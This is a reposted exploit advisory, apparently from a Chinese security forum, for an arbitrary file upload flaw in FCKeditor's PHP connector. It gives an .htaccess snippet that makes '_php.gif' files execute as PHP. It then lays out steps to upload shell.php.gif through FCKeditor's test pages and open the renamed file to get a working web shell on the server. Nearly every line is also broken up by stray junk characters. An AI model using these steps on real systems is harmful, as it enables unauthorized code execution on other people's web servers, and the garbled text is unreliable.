FCKeditor所有php版本Upload上传漏洞
2 n* t; Q5 }+ I9 j作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
1 x! W$ J0 a8 ~# h" L2 D& R减小字体 增大字体
S" o' M' w" ] z( _( g: C5 Q2 q[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability9 x- F0 Z& `% ?- X4 j1 x: I
[+] Date: 2011# T0 W8 m# a2 n! O; ?
[+] Author : sinesafe.cn
( l# f6 }+ ?$ A6 x1 A[+] Website : WwW.sinesafe.cn. ~; y3 O: F5 [" W$ p; n4 S
———————————————————4 z J5 t% t& _. o
1.create a htaccess file:, [2 D9 I+ P% A, j
code:) w: K, d; |9 w$ v- P2 H
<FilesMatch “_php.gif”>% d0 I/ Y2 w% y- O7 h, v
SetHandler application/x-httpd-php
( ^6 u% G- j, K$ G. \</FilesMatch>$ m' J# h/ r, L4 [
7 W6 V% J7 I* e5 s2.Now upload this htaccess with FCKeditor.
, M, x4 e: B; O
% P0 P& ^" r3 z& t' e1 q4 |http://www.sinesafe.cn/FCKeditor ... er/upload/test.html; U& \& B; v$ o6 S
+ a8 d: k4 n" }3 u. E* H
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
9 z' n0 D$ v0 X/ m7 G' r4 r5 @ U" r4 o, |8 E( J" L/ s3 t) l
———————————————————————————————-# |% I- E2 n7 z$ |. N O" Y0 @
3.Now upload shell.php.gif with FCKeditor.4 Z/ E: X$ a) n' R: X& N) \
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
( c% m& f. j, Y) _5.http://www.sinesafe.cn/anything/shell_php.gif
4 _3 o. \7 O8 L6.Now shell is available from server. |
G6 U8 | G' M3 \0 t1 d
, }# d3 F% C7 z! y
. |" O) m, t- O0 i; B, P" E |
发表于 2013-10-27 17:25:21
收藏
支持
反对